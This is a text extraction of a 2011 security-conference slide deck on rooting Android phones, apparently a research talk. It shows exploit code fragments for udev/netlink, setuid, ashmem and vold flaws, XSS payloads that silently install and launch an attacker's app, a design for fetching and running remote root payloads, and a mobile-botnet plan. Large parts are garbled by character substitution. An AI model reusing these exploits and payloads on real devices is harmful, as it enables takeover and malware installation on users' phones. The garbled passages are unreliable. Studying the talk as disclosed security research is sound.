bsides11-dontrootrobots

7/24/2019 bsides11-dontrootrobots

1/82

Slide # 1DON'T ROOT ROBOTS! - BSides Detroit 2011


2/82


A TEAM JOCH Production

Jon Oberheide + ZachLanier=

TEAM JOCH


3/82


DON'T DATE ROBOTS!


4/82


Agenda

Overview

Escalation

Delivery

Persistence


5/82

Slide # DON'T ROOT ROBOTS! - BSides Detroit 2011

i A Hu"an#!

$hat'# in an Android%


6/82

DON'T ROOT ROBOTS! - BSides Detroit 2011

Android at a &ance

!ase "lator$% &'( core

% Lin)* 2,3* -ernel

.ative libraries

% libc/ 0eb-it/ etc

Dalvi- (% 'eisterbased (

% ')ns de* bytecode

&""lications% Develo"ed in ava

% ')n on Dalvi- (

% Lin)* "rocess 151


7/82DON'T ROOT ROBOTS! - BSides Detroit 2011

Per"i##ionBa#ed Mode

&""s e*"licitly re6)est"redeined "er$issions

E*a$"les5% 7ell)lar5 calls/ S(S/ ((S

% .et8or-/ !l)etooth/ 0i9i

% :ard8are5 vibrate/ bac-liht

% Location5 coarse/ ine%&"" data5 contacts/ calendars



A(( Sand)o*ing

;Sandbo*ed< by standard .>? )id@id% Aenerated )ni6)e "er a"" at install ti$e

:ihlevel "er$issions restricted by&ndroid r)nti$e ra$e8or-



A(( Di#tri)ution

&""lication sinin

% Selsined by develo"ers

&ndroid (ar-et% B2 sin)"/ anyone can ")blish

%&nony$o)s sin)" is "ossible


10/82Slide # 1CDON'T ROOT ROBOTS! - BSides Detroit 2011

Agenda

Overvie8

E#caation

Delivery

Persistence


11/82


DON'T ROOT ROBOTS!

$h+ root +our Android%


12/82


Android Jai)rea,#

ailbrea-s can be ;AOODnhe.a$e% Zi$"erLich

% Ainer!rea- -ET'S D./E .N!


14/82


E*(oid Jai)rea,

E0P-O.D


15/82


C/E12234456

Reduce7 reu#e7 rec+ce888e*(oit#!

0on 2CCI P8nie &8ard or best "rivescJ


16/82

Slide # 1,DON'T ROOT ROBOTS! - BSides Detroit 2011

Netin, in ASC..

+---------------------+ +---------------------+ | (3) application "A" | | (3) application "B" | +------+--------------+ +--------------+------+ | | \ / \ / | | +-------+--------------------------------+-------+ | : : | user-space=====+ : (5) kernel socket API : +================

| : : | kernel-space +--------+-------------------------------+-------+ | | +-----+-------------------------------+----+ | (1) Netlink subsystem | +---------------------+--------------------+ | +---------------------+--------------------+ | (2) Generic Netlink bus |

+--+--------------------------+-------+----+ | | | +-------+---------+ | | | (4) controller | / \ +-----------------+ / \ | | +------------------+--+ +--+------------------+ | (3) kernel user "X" | | (3) kernel user "Y" | +---------------------+ +---------------------+


17/82


-et'# Pretend888




9DE/

OBJECT:9E/ENT

Hernel notiies )devo -obGect event vianetlin- interace

)dev "eror$s so$e"rivileed action


18/82

Slide # 1KDON'T ROOT ROBOTS! - BSides Detroit 2011

-ac, o; Source Chec,ing




9DE/

OBJECT:9E/ENT

Evil a"" sends )devan evil $essae vianetlin- interace

)dev "eror$s evil"rivileed action

E/.- APP


19/82

Slide # 1IDON'T ROOT ROBOTS! - BSides Detroit 2011

E*(oid Jai)rea,

&ndroid ;inherited< the )dev v)ln% ;init< dae$on enca"s)lated )dev )nctionality% Still 8as "resent years ater )dev "atch

mp = message;mp += sprintf(mp, "remove@/d") + 1;mp += sprintf(mp, "SUBSYSTEM=block") + 1;mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;mp += sprintf(mp, "TIMEOUT=10") + 1;mp += sprintf(mp, "ACTION=remove") + 1;mp += sprintf(mp, "REMOVE_CMD=/tmp/run") + 1;

(y non&ndroid )dev e*"loit G)st ran @t$"@r)n as root5


20/82

Slide # 2CDON'T ROOT ROBOTS! - BSides Detroit 2011

E*(oid Pa+oad

close(creat("loading", 0666));if ((ofd = creat("hotplug", 0644)) < 0)

die("[-] creat");if (write(ofd, path , strlen(path)) < 0)

die("[-] write");close(ofd);symlink("/proc/sys/kernel/hotplug", "data");snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c"

"FIRMWARE=../../..%s/hotplug%c",0, basedir, 0, 0, basedir, 0);

Stealths "ayload loo-ed li-e the ollo8in5

$hat'# ha((ening here%

< create# =oading> ;ie

< write# =hot(ug> ;ie

< #+"in,# =data>

< netin, "#g

< (ath to e*(oid )inar+


21/82


9#e the Source7 -u,e!

void process_firmware_event(struct uevent *uevent){...

l = asprintf(&root, SYSFS_PREFIX"%s/", uevent->path);

l = asprintf(&loading, "%sloading", root); l = asprintf(&data, "%sdata", root); l = asprintf(&file1, FIRMWARE_DIR1"/%s", uevent->firmware);... loading_fd = open(loading, O_WRONLY);

data_fd = open(data, O_WRONLY);

fw_fd = open(file1, O_RDONLY);

... if(!load_firmware(fw_fd, loading_fd, data_fd))

9ro$ htt"5@@androidit-ernelor@F"="lator$@syste$@coreitMa=blobM=init@devicesc 5

^ /sys/../sqlite_stmt_journals/loading

^ /etc/firmware/../../sqlite_stmt_journals/hotplug

^ /sys/../sqlite_stmt_journals/data
http://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.chttp://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.c


22/82


9#e the Source7 -u,e!

int load_firmware(int fw_fd, int loading_fd, int data_fd){...

write(loading_fd, "1", 1); /* start transfer */

while (len_to_copy > 0) { nr = read(fw_fd, buf, sizeof(buf));... while (nr > 0) { nw = write(data_fd, buf + nw, nr);

...}

9ro$ htt"5@@androidit-ernelor@F"="lator$@syste$@coreitMa=blobM=init@devicesc 5

< read ;ro" =hot(ug>

< write to =data>

Netin, "e##age cau#e# the init dae"on to read the

content# o; =hot(ug> and write the" into =data>
http://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.chttp://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.c


23/82


BOOM! ROOT!

'e$e$ber5% ;hot"l)< contains "ath to e*"loid

% ;data< is sy$lin-ed to @"roc@sys@-ernel@hot"l)

So5% @"roc@sys@-ernel@hot"l) no8 contains the "ath

to the e*"loid binary

% Overrides the dea)lt hot"l) "ath >nvo-e hot"l)5

% E*"loid 8ill be r)n as rootJ


24/82


RageAgain#tTheCage Jai)rea,

RA&EA&A.NSTTHECA&E


25/82


?uic, Trivia

/* Code intended to run with elevated privileges */do_stuff_as_privileged();

/* Drop privileges to unprivileged user */setuid(uid);

/* Code intended to run with lower privileges */

do_stuff_as_unprivileged();

$hat'# wrong with the ;oowing code%

&ss)$in a )id@e)id=C "rocess dro""in "rivilees


26/82


Setuid ?uir,#

/* Drop privileges to unprivileged user */setuid(uid);

ERRORS EAGAINThe uid does not match the current

uid and uid brings process over itsRLIMIT_NPROCresource limit.

9ro$ set)idN2 $an "ae5

0ell/ theres really only one line o interest5

>ts tr)e/ set)idN can and 8ill ail


27/82


-inu* Re#ource -i"it#

RLIMIT_NPROC The maximum number of processes (or, more precisely on Linux, threads) that can be

created for the real user ID of the calling process. Upon encountering this limit, fork(2)

fails with the error EAGAIN.

0hat is 'L>(>.P'O7F

> there are too $any "rocesses or the )id

8ere dro""in to/ set)idN 8ill ailJ

hereore/ "rivilees 8ill not be dro""edand 8ell contin)e e*ec)tion 8ith )id=CJ


28/82


E*(oiting #etuid@1 .##ue#

> 8e can artiicially inlate the n)$ber o"rocesses o8ned by the taret )id/ 8e can

hit )ids 'L>(>.P'O7 and orce set)idNto ail 8ith errno E&A&>.

:o"e)lly/ the binary r)nnin 8ith )id=C 8illthen "eror$ so$e )nsae o"eration that8e can inl)ence


29/82


Android De)ug Bridge

&D!5Android Debug Bridge (adb) is a versatile oand

line tool t"at lets #ou ouniate $it" an eulator

instane or onneted Android-%o$ered devie& t is alient-server %rogra t"at inludes t"ree o%onents

Q

A daeon $"i" runs as a ba*ground %roess on

ea" eulator or devie instane& A)ess 8hat &D! ails to do 8hen it calls

set)id to dro" "rivileesF


30/82


RageAgain#tTheCage E*(oit

&D! ails to chec- set)idN ret)rn val)e5

'ae&ainsthe7ae e*"loit5

% or-N )" to 'L>(>.P'O7 or ;shell< )ser% Hill adb/ or-N aain/ adb ails set)idN

% Ro)r adb shell is no8 a root shellJ

/* then switch user and group to "shell" */setgid(AID_SHELL);

setuid(AID_SHELL);


31/82


iing.nTheNa"eO; Jai)rea,

.--.N&.NTHENAMEO


32/82


Android'# a#h"e"

ash$e$

% 7)sto$ sh$e$ interace by Aoole5

T"e as"e subs#ste is a ne$ s"aredeor# alloator siilar to +OS, S. but

$it" di//erent be"avior and s%orting a si%ler

/ile-based A+&

7)sto$ code T ri"e or v)lnerabilitiesJ


33/82


a#h"e" Pro(ert+ Ma((ing

ash$e$ $a"s in &ndroid syste$"ro"erties in to each address s"ace

.ot $$a"ed P'O0'>E than-)lly/that 8o)ld be bad/ 8o)ldnt itF

# cat /proc/178/maps...40000000-40008000 r-xs 00000000 00:07 187/dev/ashmem/system_properties (deleted)...


34/82


Android Pro(ertie#

&ndroid "ro"erties5

rosec)re deter$ines 8hether &D! r)ns as

root or dro"s "rivs to &>DS:ELL )ser > 8e can chane it to C/ 8eve ot rootJ

$ getprop[ro.secure]: [1]

[ro.allow.mock.location]: [1][ro.debuggable]: [1]...


35/82


iing.nTheNa"eO; E*(oit

)rns o)t ash$e$ 8ill let )s $"rotect the$a""in as P'O0'>E5

9li" the rosec)re "ro"erty to C5

S"a8n root adb shellJ

printf("[+] Found prop area @ %p\n", prop);

if (mprotect(prop, PA_SIZE, PROT_READ|PROT_WRITE) < 0) die("[-] mprotect");

if (strcmp(pi->name, "ro.secure") == 0) { strcpy(pi->value, "0");


36/82


i"(er-ich Jai)rea,

.MPER-.CH


37/82


i"(er-ich Jai)rea,

&9ESS $HAT%

Sa"e a# Rage.nTheCage7e*ce(t ;or the +gote (roce##!

(issin ret)rn val)e chec- on set)idN2

&


38/82


&ingerBrea, Jai)rea,

&.N&ERBREA

&i B , J i) ,


39/82


&ingerBrea, Jai)rea,

&9ESS $HAT A&A.N%

Sa"e a# E*(oid7e*ce(t ;or the vod (roce##!

(issin so)rce chec- on netlin- $essae

&i B , / )iit


40/82


&ingerBrea, /unera)iit+

void DirectVolume::handlePartitionAdded(const char *devpath,NetlinkEvent *evt){

int major = atoi(evt->findParam("MAJOR")); int minor = atoi(evt->findParam("MINOR"));... int part_num; const char *tmp = evt->findParam("PARTN");... part_num = atoi(tmp);

... if (part_num > mDiskNumParts) { mDiskNumParts = part_num; }

mPartMinors[part_num -1] = minor;

S(ot the vun in vod'# Direct/ou"e8c((!

A )it $ it / )iit


41/82


Ar)itrar+ $rite /unera)iit+

&rbitrary 8rite via neative inde*% S"oo netlin- $s 8ith $alicio)sly

crated P&'. and (>.O'n = snprintf(buf, sizeof(buf), "@/foo%cACTION=add%c" "SUBSYSTEM=block%c" "DEVPATH=%s%c" "MAJOR=179%cMINOR=%d%c" "DEVTYPE=harder%cPARTN=%d", 0, 0, 0, bsh,

0, 0, vold.system, 0, 0, -idx);

&i B , N0 B


42/82


&ingerBrea, N0 B+(a##

!)t 8here@8hat to 8riteF

So$e &ndroid devices have .? stac-@hea"

% !)t lac- other hardenin $echansi$s A77s 'EL'O

% cc 0l/U/relro/U/no8

% (a"s AO as readonly > no 'EL'O5

% 7lobber AO entry to $odiy control lo8

&i B , E it


43/82


&ingerBrea, E*(oit

.ot 6)ite so si$"le tho)h5% Discover AO/ syste$N/ etc addresses

% 7lobber AO or )nctions Natoi/ etc T syste$N

% 9)ncs called on attac-er controlled data5

% atoi=syste$ and t$"=;@data@local@t$"@boo$sh$"actF% Pretty catastro"hic

Java#cri(t 0SS(a+oad can trigger

the in#ta o; an+ a((

to +our (hone8

0SS .n#ta Pa+oad


52/82


0SS .n#ta Pa+oad

/* silently install malicious app to victim phone */

$.post('/install', { id: 'com.attacker.maliciousapp', device: initProps['selectedDeviceId'], token: initProps['token'], xhr: '1' }, function(data) {});

>nstall "ayload5

9orces )sers bro8ser to re6)est install oco$attac-er$alicio)sa""

0SS Trigger Pa+oad


53/82


0SS Trigger Pa+oad

/* append hidden iframe */$('body').append($(''));

/* continually trigger iframe src */function trigger() { $('#xss').attr('src', 'trigger://blah'); setTimeout('trigger()', 1000);}setTimeout('trigger()', 1000);

rier "ayload5

9orces )sers "hone to ;a)tor)n< the$alicio)s a"" ater install

$e) Mar,et -e##on#


54/82


$e) Mar,et -e##on#

?SS '7E

% 'arely )sed in the sa$e sentenceJ

7rossdevice v)lnerabilities% Dont cross the strea$sat least 8itho)t a

si$"le conir$ation "ro$"tJ oO

9i*ed the ?SS b)t not the )nderlyin iss)e% )st 8ait a e8 $onths or the ne*t ?SS

Angr+ Bird# Attac,


55/82


Angr+ Bird# Attac,

AN&R B.RDS ATTAC

Perceived A(( .n#ta Proce##


56/82

Slide # ,DON'T ROOT ROBOTS! - BSides Detroit 2011

Perceived A(( .n#ta Proce##

48 Brow#e 18 .n#ta 8 A((rove BOOM!

Actua A(( .n#ta Proce##


57/82


Actua A(( .n#ta Proce##

1 ser clic-s install@a""rove

2 (ar-et a"" POSs install re6)est toAoole

3 (ar-et servers sinal 72D( servers

4 72D( servers ")sh do8n >.S&LL&SSE

Aal-Service receives >.S&LL&SSE andinvo-es vendin

, endin co$"onent etches &PH and installs

Mar,et .nteraction#


58/82

Slide # KDON'T ROOT ROBOTS! - BSides Detroit 2011

Mar,et .nteraction#

Aoole is a snea-y "andaJ% Ro) dont act)ally do8nload @ install the a""

thro)h the $ar-et a""lication

0hen yo) clic- install in $ar-et a""% Aoole servers ")sh an o)toband $essae

do8n to yo) via "ersistent data connection

% riers >.S&LL&SSE intent to start install

% >ntent handler etches &PH and installs

De* B+tecode RE


59/82

Slide # IDON'T ROOT ROBOTS! - BSides Detroit 2011

De* B+tecode RE

&Ta,Service Connection


60/82

Slide # ,CDON'T ROOT ROBOTS! - BSides Detroit 2011

&Ta,Service Connection

Persistent data connection% S"ea-s ?(PP

% Sa$e connection no8 )sed or

72D( ")sh service

Aa" in res"onsibility%

(ar-et a"" does a""oves "er$s% !)t Atal-Service triers install

% heres a disconnect here

Mar,et A(( ReFue#t#


61/82

Slide # ,1DON'T ROOT ROBOTS! - BSides Detroit 2011

Mar,et A(( ReFue#t#

0hat does the $ar-et a"" POS to the$ar-et serverF

7an 8e s"oo the sa$e re6)est and

trier an >.S&LL&SSE $essae ands)bse6)ent installF

Ba#eG Encoded Proto)u;


62/82


Ba#eG Encoded Proto)u;

Raw Proto)u; Decoded


63/82


Raw Proto)u; Decoded

RE'ed Proto)u; S(eci;ication


64/82


RE ed Proto)u; S(eci;ication

a""@asset >D

a)th to-en

install re6)est$essae

Ee"ent# o; an .n#ta ReFue#t


65/82


Ee"ent# o; an .n#ta ReFue#t

0e have the or$at o the re6)est no8J

.eed to "o")late it 8ith5% Lots o $iscellaneo)s ields

%&"" >D5 taret a"" to be installed 7an be derived ro$ dissectin $ar-et re6)ests

%&)th to-en5 the hard "artF )rns o)t 8e can steal it ro$ &ndroids &cco)nt(anaerJ

B+(a##ing Per"i##ion# A((rova


66/82

Slide # ,,DON'T ROOT ROBOTS! - BSides Detroit 2011

B+(a##ing Per"i##ion# A((rova

Steal the ;android< service to-en )sed by $ar-etro$ the &cco)nt(anaer

7onstr)ct "rotob) re6)est to $ar-et serversor invo-in an a""lication installer

>.S&LL&SSE is ")shed and a"" installed

8itho)t any )ser "ro$"t @ "er$ission a""roval

Po7 dis)ised as an &nry !irds e*"ansion a""

Angr+ Bird# Bonu# -eve#


67/82


Angr+ Bird# Bonu# -eve#

a,e To raud A((


68/82

Slide # ,KDON'T ROOT ROBOTS! - BSides Detroit 2011

a,e To raud A((

RootStra(


69/82

Slide # ,IDON'T ROOT ROBOTS! - BSides Detroit 2011

RootStra(

ROOTSTRAP

Android Native Code


70/82

Slide # CDON'T ROOT ROBOTS! - BSides Detroit 2011

Android Native Code

Dalvi- ( J= sandbo*% .ot li$ited to e*ec)tin de* bytecode

% 7an "o" o)t o the ( to e*ec)te native code

.ative code "ac-aed 8ithin &PHs%&ndroid sho)ld do so$e code sinin li-e iPhone

% !)t it doesnt/ so 8hy li$it e*ec)tion o native code tob)ildti$e "ac-aed $od)lesF

RootStra(


71/82


RootStra(

:o8 to deliver "ayloads $ost eectivelyF

Enter/ 'ootStra"

% Silent r)nti$eetchin ande*ec)tion ore$ote &'(

"ayloads

Native ARM Code Deiver+


72/82


Native ARM Code Deiver+

9etch inde* ile% Lists available e*"loits and $od)le na$es

Ran- do8n &'( $od)les% D)$"ed to &ndroid a"" "rivate storae

% e @data@data@orrootstra"@iles/ not @libs

Load via .> and e*ec)te each "ayload% Syste$loadN;@iles@root1so


73/82


How to Buid a Mo)ie Botnet

!)ild so$e )n leitloo-in a$es @ a""s% >ncl)de 'ootStra" )nctionality

% Periodically "hone ho$e to chec- or ne8 "ayloads

&s soon as ne8 v)ln@Gailbrea- is ")blished/")sh do8n "ayload to 'ootStra"ed "hones% !eore "roviders ")sh o)t O& "atch

% rivial to 8in that race/ slo8 O& )"dates

'oot-it a b)nch o "honesJ

A $o; in /a"(ire'# Cothing%


74/82


A $o; in /a"(ire # Cothing%

'ootStra" a"" is borin and not snea-y% .o one 8o)ld intentionally do8nload it

% .eed so$ethin leit loo-in to et a lareinstall base

:$$8hat to do/ 8hat to do

a,e Twiight Eci(#e A((


75/82


a,e Twiight Eci(#e A((

And+ and Jai"e Don't -i,e .t I@


76/82


And+ and Jai"e Don t -i,e .t I @

Still/ 2CC+ do8nloads

in )nder 24 ho)rs

0ith a leitloo-in

a""@a$e/ yo) co)ld

collect 6)ite an install

base or 'ootStra"

Agenda


77/82


Agenda

Overvie8

Escalation Delivery

Per#i#tence

Per#i#tence


78/82

Slide # KDON'T ROOT ROBOTS! - BSides Detroit 2011

e # #te ce

Hand# o;; our root,it!

Sta+ing on the Device


79/82

Slide # IDON'T ROOT ROBOTS! - BSides Detroit 2011

+ g

Aoole 8ill 8i"e ;bad< a""s% (y 'ootStra" a""/ as a dryr)n

% DroidDrea$ $al8are/ or realU

!ad )ys 8ant to stay on the device% (aintain 7W7/ deliver ne8 "ayloads/ etc

Sur%risingl# enoug" 've #et to see an# Android

al$are %er/or an# %ost-rooting sel/-%rotetion&

REMO/E ASSET Patching


80/82

Slide # KCDON'T ROOT ROBOTS! - BSides Detroit 2011

: g

'E(OE&SSE%&llo8s Aoole to re$ote 8i"e a""s

% Easy to "atch o)t the de*code i yo)re root

endina"-% co$androidvendin

% 'e$ove&sset'eceiverclass% Patch in a C*CeCC @ ret)rnvoid instr)ction

at beinnin o on'eceiveN


81/82

?ue#tion#%


82/82

Jon O)erheide

XGonoberheide

GonXoberheideor

Duo Securit+

Date post:	21-Feb-2018
Category:	Documents
Upload:	itsv4v
View:	219 times
Download:	0 times

bsides11-dontrootrobots

Documents